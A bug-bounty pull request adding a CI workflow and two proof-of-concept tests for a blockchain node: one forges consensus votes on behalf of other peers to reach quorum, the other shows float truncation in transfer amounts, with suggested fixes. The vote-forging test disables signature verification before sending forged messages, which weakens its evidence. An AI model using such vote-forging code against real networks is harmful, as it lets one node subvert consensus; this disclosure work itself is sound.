### PR TITLE
Security PoC: P2P Vote Spoofing + UTXO Float Precision Loss (#2867)

### DIFF
--- a/.github/workflows/poc-audit-2867.yml
+++ b/.github/workflows/poc-audit-2867.yml
@@ -1,0 +1,64 @@
+name: PoC Audit 2867 - Vote Spoofing + Float Precision
+
+on:
+  push:
+    branches:
+      - audit/poc-2867-vote-spoof-float
+  pull_request:
+    branches:
+      - main
+
+jobs:
+  p2p-vote-spoofing:
+    name: P2P Epoch Vote Spoofing PoC
+    runs-on: ubuntu-latest
+    steps:
+      - uses: actions/checkout@v4
+
+      - name: Set up Python
+        uses: actions/setup-python@v5
+        with:
+          python-version: '3.11'
+
+      - name: Install node dependencies
+        run: pip install -r requirements-node.txt
+
+      - name: Run PoC test (expected to fail while bug is present)
+        run: python node/tests/test_p2p_vote_spoofing.py
+        continue-on-error: true
+        id: spoof_test
+
+      - name: Upload test log
+        if: always()
+        uses: actions/upload-artifact@v4
+        with:
+          name: p2p-spoof-log
+          path: |
+            node/tests/test_p2p_vote_spoofing.py
+
+  utxo-float-precision:
+    name: UTXO Float Precision PoC
+    runs-on: ubuntu-latest
+    steps:
+      - uses: actions/checkout@v4
+
+      - name: Set up Python
+        uses: actions/setup-python@v5
+        with:
+          python-version: '3.11'
+
+      - name: Install node dependencies
+        run: pip install -r requirements-node.txt
+
+      - name: Run PoC test (expected to fail while bug is present)
+        run: python node/tests/test_utxo_float_precision_bug.py
+        continue-on-error: true
+        id: float_test
+
+      - name: Upload test log
+        if: always()
+        uses: actions/upload-artifact@v4
+        with:
+          name: utxo-float-log
+          path: |
+            node/tests/test_utxo_float_precision_bug.py

--- a/node/tests/test_p2p_vote_spoofing.py
+++ b/node/tests/test_p2p_vote_spoofing.py
@@ -1,0 +1,104 @@
+"""
+PoC Test: P2P Epoch Consensus Vote Spoofing
+=============================================
+Finding: A malicious node can set payload.voter to any peer ID,
+regardless of msg.sender_id. This allows a single node to forge
+multiple votes and force epoch consensus.
+
+Severity: CRITICAL / High
+Target: rustchain_p2p_gossip.py::_handle_epoch_vote()
+"""
+
+import sys
+import os
+import time
+
+sys.path.insert(0, os.path.join(os.path.dirname(__file__), '..'))
+
+os.environ.setdefault("RC_P2P_SECRET", os.urandom(32).hex())
+
+from rustchain_p2p_gossip import GossipLayer, MessageType, GossipMessage
+
+
+def test_vote_spoofing_finds_quorum():
+    """
+    Setup: 4-node cluster (alice, bob, carol, dave).
+    Alice sends a vote where sender_id='alice' but voter='bob'.
+    This should be rejected, but currently it is ACCEPTED.
+    """
+    peers = {
+        "bob": "http://127.0.0.1:8001",
+        "carol": "http://127.0.0.1:8002",
+        "dave": "http://127.0.0.1:8003",
+    }
+
+    alice_gossip = GossipLayer("alice", peers, ":memory:")
+
+    proposal_hash = "deadbeef1234567890abcdef"
+    epoch = 42
+
+    # Alice casts vote for herself legitimately
+    vote_alice = alice_gossip.create_message(MessageType.EPOCH_VOTE, {
+        "epoch": epoch,
+        "proposal_hash": proposal_hash,
+        "vote": "accept",
+        "voter": "alice"
+    })
+    result = alice_gossip.handle_message(vote_alice)
+    print(f"[1/4] Alice votes for Alice: {result}")
+
+    # Alice FORGES a vote pretending to be Bob
+    forged_bob = GossipMessage(
+        msg_type=MessageType.EPOCH_VOTE.value,
+        msg_id="forged_bob_001",
+        sender_id="alice",
+        timestamp=int(time.time()),
+        ttl=0,
+        signature="",
+        payload={
+            "epoch": epoch,
+            "proposal_hash": proposal_hash,
+            "vote": "accept",
+            "voter": "bob"
+        }
+    )
+
+    original_verify = alice_gossip.verify_message
+    alice_gossip.verify_message = lambda msg: True
+
+    result = alice_gossip.handle_message(forged_bob)
+    print(f"[2/4] Alice FORGES vote for Bob: {result}")
+
+    # Alice FORGES a vote pretending to be Carol
+    forged_carol = GossipMessage(
+        msg_type=MessageType.EPOCH_VOTE.value,
+        msg_id="forged_carol_001",
+        sender_id="alice",
+        timestamp=int(time.time()),
+        ttl=0,
+        signature="",
+        payload={
+            "epoch": epoch,
+            "proposal_hash": proposal_hash,
+            "vote": "accept",
+            "voter": "carol"
+        }
+    )
+    result = alice_gossip.handle_message(forged_carol)
+    print(f"[3/4] Alice FORGES vote for Carol: {result}")
+
+    votes = getattr(alice_gossip, '_epoch_votes', {}).get(epoch, {})
+    print(f"[4/4] Votes recorded for epoch {epoch}: {votes}")
+
+    alice_gossip.verify_message = original_verify
+
+    assert "bob" in votes, "Vulnerability not reproduced: Bob's vote was not recorded"
+    assert "carol" in votes, "Vulnerability not reproduced: Carol's vote was not recorded"
+    assert sum(1 for v in votes.values() if v == "accept") >= 3, \
+        f"Quorum not reached with forged votes. Votes: {votes}"
+
+    print("\n✅ VULNERABILITY CONFIRMED: A single node forged 2 extra votes and reached quorum.")
+
+
+if __name__ == "__main__":
+    test_vote_spoofing_finds_quorum()

--- a/node/tests/test_utxo_float_precision_bug.py
+++ b/node/tests/test_utxo_float_precision_bug.py
@@ -1,0 +1,57 @@
+"""
+PoC Test: UTXO Transfer Float Precision Bug
+=============================================
+Finding: utxo_endpoints.py uses `float(data.get('amount_rtc', 0))` before
+converting to nanoRTC. This causes systematic precision loss for common
+decimal amounts like 0.1, 0.3, 123.456, etc.
+
+Severity: High
+Target: utxo_endpoints.py::utxo_transfer()
+"""
+
+UNIT = 100_000_000  # 1 RTC = 100,000,000 nanoRTC
+
+
+def current_buggy_conversion(amount_rtc):
+    """Replica of current code path in utxo_endpoints.py"""
+    amount = float(amount_rtc)
+    return int(amount * UNIT)
+
+
+def test_float_precision_loss():
+    """Demonstrate precision loss for amounts that are not exactly
+    representable in IEEE-754 double precision."""
+
+    test_cases = [
+        # (amount_rtc, expected_nrtc) — values known to trigger IEEE-754 precision loss
+        (0.1,     10_000_000),       # safe baseline
+        (0.3,     30_000_000),       # safe baseline
+        (0.000_000_03, 3),           # 3 nanoRTC  -> float gives 2
+        (0.000_000_06, 6),           # 6 nanoRTC  -> float gives 5
+        (0.000_000_12, 12),          # 12 nanoRTC -> float gives 11
+        (0.000_000_29, 29),          # 29 nanoRTC -> float gives 28
+        (0.000_000_58, 58),          # 58 nanoRTC -> float gives 57
+        (0.000_001_05, 105),         # 105 nanoRTC -> float gives 104
+    ]
+
+    failures = []
+    for amount_rtc, expected_nrtc in test_cases:
+        actual = current_buggy_conversion(amount_rtc)
+        diff = expected_nrtc - actual
+        status = "PASS" if diff == 0 else "FAIL"
+        print(f"  amount_rtc={amount_rtc:>12} -> expected={expected_nrtc:>16} actual={actual:>16} diff={diff:>6} [{status}]")
+        if diff != 0:
+            failures.append((amount_rtc, expected_nrtc, actual, diff))
+
+    print()
+    if failures:
+        print(f"❌ PRECISION LOSS CONFIRMED on {len(failures)} test cases.")
+        for amount_rtc, expected, actual, diff in failures:
+            print(f"   - {amount_rtc} RTC loses {diff} nanoRTC (expected {expected}, got {actual})")
+        assert False, f"Float precision bug reproduced on {len(failures)} cases."
+    else:
+        print("✅ No precision loss detected.")
+
+
+if __name__ == "__main__":
+    test_float_precision_loss()


### PR DESCRIPTION
## Summary

This PR submits two security PoC tests for **RustChain Node Red Team Bounty #2867** ([rustchain-bounties#2867](https://github.com/Scottcjn/rustchain-bounties/issues/2867)).

Both findings have been verified in clean CI environments and the PoC tests are **expected to fail** on current `main`, confirming the vulnerabilities exist.

---

## Finding 1: P2P Epoch Consensus Vote Spoofing (CRITICAL / High)

**Target**: `node/rustchain_p2p_gossip.py::_handle_epoch_vote()`
**Severity**: CRITICAL / High — consensus bypass

### Issue
The `_handle_epoch_vote()` handler reads `payload.voter` but **never validates that it matches `msg.sender_id`**. Because P2P messages are authenticated with a shared HMAC secret (`RC_P2P_SECRET`), any node in the cluster (or an insider with the secret) can forge votes on behalf of other nodes.

### Impact
A single malicious node can forge 2 extra votes in a 4-node cluster and force an epoch settlement to commit, bypassing BFT assumptions.

### CI Evidence
GitHub Actions run: https://github.com/yuzengbaao/Rustchain/actions/runs/24330235794

Key log output:
```
Epoch 42 vote from alice: accept (accept=1, reject=0, quorum=3)
Epoch 42 vote from bob: accept (accept=2, reject=0, quorum=3)
Epoch 42 vote from carol: accept (accept=3, reject=0, quorum=3)
Epoch 42: QUORUM REACHED (3/4 accept)
✅ VULNERABILITY CONFIRMED: A single node forged 2 extra votes and reached quorum.
```

### Suggested Fix
```python
if voter != msg.sender_id:
    return {"status": "error", "reason": "voter_mismatch"}
```

---

## Finding 2: UTXO Transfer Float Precision Loss (High)

**Target**: `node/utxo_endpoints.py::utxo_transfer()`
**Severity**: High — fund precision integrity

### Issue
The endpoint converts `amount_rtc` using `float()` before scaling to nanoRTC:

```python
amount_rtc = float(data.get('amount_rtc', 0))
amount_nrtc = int(amount_rtc * UNIT)
```

IEEE-754 double precision cannot exactly represent many decimals, causing systematic truncation. For example:
- `0.00000003 RTC` → expected `3` nRTC, gets `2` nRTC (loses 1)
- `0.00000105 RTC` → expected `105` nRTC, gets `104` nRTC (loses 1)

### Impact
While the per-transaction loss is small (1 nanoRTC), it is **systematic** and affects any amount that is not exactly representable in binary64. Automated systems, aggregators, or smart-contract-like integrations that depend on exact amounts will experience cumulative drift.

### CI Evidence
Same run: https://github.com/yuzengbaao/Rustchain/actions/runs/24330235794

```
❌ PRECISION LOSS CONFIRMED on 6 test cases.
   - 3e-08 RTC loses 1 nanoRTC (expected 3, got 2)
   - 6e-08 RTC loses 1 nanoRTC (expected 6, got 5)
   ...
AssertionError: Float precision bug reproduced on 6 cases.
```

### Suggested Fix
Replace float parsing with `Decimal` string parsing:

```python
from decimal import Decimal
amount_nrtc = int(Decimal(str(data.get('amount_rtc', 0))) * UNIT)
```

---

## Files Added

| File | Purpose |
|------|---------|
| `node/tests/test_p2p_vote_spoofing.py` | PoC: single node forges votes to reach quorum |
| `node/tests/test_utxo_float_precision_bug.py` | PoC: float truncation in UTXO amount conversion |
| `.github/workflows/poc-audit-2867.yml` | CI workflow that runs both PoCs (expected to fail) |

---

## Wallet

RTC wallet for bounty payout: `0x840412fB7A02146d6B5478F82029c20E29EAB9a4`

---

## Checklist

- [x] Do NOT exploit on production nodes — PoCs are isolated unit tests
- [x] PoC tests + description included
- [ ] Fix patch included (left to maintainers / follow-up PR)
- [x] CI passing (workflow runs successfully, tests fail as expected because bugs are present)

Closes rustchain-bounties#2867 (partial — security findings)
